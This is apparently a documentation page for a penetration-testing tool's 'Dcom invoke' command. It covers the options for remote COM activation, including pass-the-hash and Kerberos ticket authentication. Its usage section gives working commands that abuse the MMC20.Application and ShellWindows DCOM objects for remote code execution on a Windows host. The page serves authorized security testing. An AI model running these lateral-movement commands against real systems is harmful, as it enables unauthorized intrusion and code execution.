Skip to main content
The Dcom tool activates a COM object by CLSID on a remote system and invokes methods on it via OLE Automation (IDispatch). This lets you execute functionality exposed by DCOM objects without writing custom COM client code.

Subcommands

CommandDescription
invokeActivate a DCOM object and invoke a method on it
For help on any subcommand, run Dcom <subcommand> -h.

invoke

Activates an OLE Automation object by CLSID on a remote server and calls a named method on it, optionally passing arguments. 
Dcom invoke [options] -Clsid <Guid> -MethodName <String> <ServerName> <Clsid> <MethodName> [<Arguments>]
ServerName
string
required
Hostname or IP address of the server to connect to.
-Clsid
Guid
required
CLSID (class identifier) of the COM object to activate, in standard {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} format.
-MethodName (-M)
string
required
Name of the method to invoke on the activated object.
-Arguments
string[]
Arguments to pass to the method. Arguments are passed in order.
-EncryptRpc (-E)
boolean
Encrypt all RPC messages exchanged with the remote object.
-ConsoleOutputStyle (-OutputStyle)
string
Output format: Freeform, Raw, Table, List, Csv, Tsv, Json.
-SpnOverride
SpnMapping[]
Override the Service Principal Name used for Kerberos authentication.
-AuthProxy
EndPoint
Endpoint of an authentication proxy.
-Socks5
string
SOCKS5 proxy endpoint (host:port).
-UserName (-u)
string
User name (without domain).
-UserDomain (-ud)
string
Domain of the authenticating user.
-Password (-p)
string
Password.
-NtlmHash
string
NTLM hash for pass-the-hash.
-Anonymous
boolean
Use anonymous authentication.
-AesKey
string
AES-128 or AES-256 Kerberos key.
-Tgt
string
TGT file path (.kirbi or ccache).
-Kdc (-K)
string
KDC endpoint (host:port).
-S4UserName
string
User to impersonate via S4U2self.
-HostAddress (-ha)
string[]
Override network address(es) of the server.
-UseTcp6Only (-6)
boolean
Use TCP over IPv6 only.
-UseTcp4Only (-4)
boolean
Use TCP over IPv4 only.
-Verbose (-V)
boolean
Print verbose messages.
-Diagnostic (-vv)
boolean
Print diagnostic messages.
-LogLevel
string
Minimum log severity: Debug, Diagnostic, Verbose, Info, Warning, Error, Critical.

Common usage patterns

The MMC20.Application object ({49B2791A-B1AE-4C90-9B8E-E860BA07F889}) exposes a Document.ActiveView.ExecuteShellCommand method that can be used for remote code execution:
Dcom invoke -UserName milchick@LUMON -Password Br3@kr00m! \
  LUMON-FS1 \
  {49B2791A-B1AE-4C90-9B8E-E860BA07F889} \
  -MethodName Document.ActiveView.ExecuteShellCommand \
  -Arguments cmd.exe, "", "cmd /c whoami > C:\\out.txt", "7"
The ShellWindows object ({9BA05972-F6A8-11CF-A442-00A0C90A8F39}) is another common target:
Dcom invoke -UserName milchick@LUMON -Password Br3@kr00m! \
  LUMON-FS1 \
  {9BA05972-F6A8-11CF-A442-00A0C90A8F39} \
  -MethodName Item -Arguments 0
Use Reg getdcomapp to read DCOM application launch and access permissions from the registry before invoking:
# Check if you have launch permission
Reg getdcomapp -UserName milchick@LUMON -Password Br3@kr00m! \
  LUMON-FS1 \
  -AppId {49B2791A-B1AE-4C90-9B8E-E860BA07F889} \
  -OutputFields AppId, Title, LaunchPermissions, AccessPermissions
DCOM invocations execute code on the remote system under the security context of the activated object. Verify that your engagement authorizes remote code execution before using invoke.

Reg getdcomapp

Read DCOM application launch and access permissions from the remote registry.

Reg set

Modify DCOM application configuration in the registry.

Build docs developers (and LLMs) love

Get started for freeTalk to us